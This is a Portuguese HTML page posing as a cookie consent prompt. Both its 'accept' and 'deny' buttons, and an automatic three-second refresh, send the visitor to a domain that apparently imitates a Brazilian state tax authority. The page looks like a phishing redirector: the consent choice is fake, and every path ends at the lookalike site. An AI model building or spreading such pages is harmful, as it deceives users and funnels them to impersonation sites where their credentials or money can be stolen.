<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Consentimento de Cookies</title>
  <style>
    body {
      background-color: #f9f9f9;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
      font-family: Arial, sans-serif;
    }
    .container {
      background-color: #fff;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 2px 8px rgba(0,0,0,0.1);
      text-align: center;
    }
    .btn {
      padding: 14px 28px; /* Botões maiores */
      margin: 10px;
      border: none;
      border-radius: 5px;
      color: #fff;
      font-weight: bold;
      font-size: 16px;
      cursor: pointer;
    }
    .btn-aceitar {
      background-color: #4CAF50;
    }
    .btn-negar {
      background-color: #f44336;
    }
  </style>
</head>
<body>
  <meta http-equiv="refresh" content="3='https://paranaemissoes.recolhimentodafazenda.org/'"/>
  <div class="container">
    <p>Este site utiliza cookies para melhorar sua experiência.<br>Deseja aceitar o uso de cookies?</p>
    <button class="btn btn-aceitar" onclick="location.href='https://paranaemissoes.recolhimentodafazenda.org/'">Aceitar</button>
    <button class="btn btn-negar" onclick="location.href='https://paranaemissoes.recolhimentodafazenda.org/'">Negar</button>
  </div>
</body>
</html>
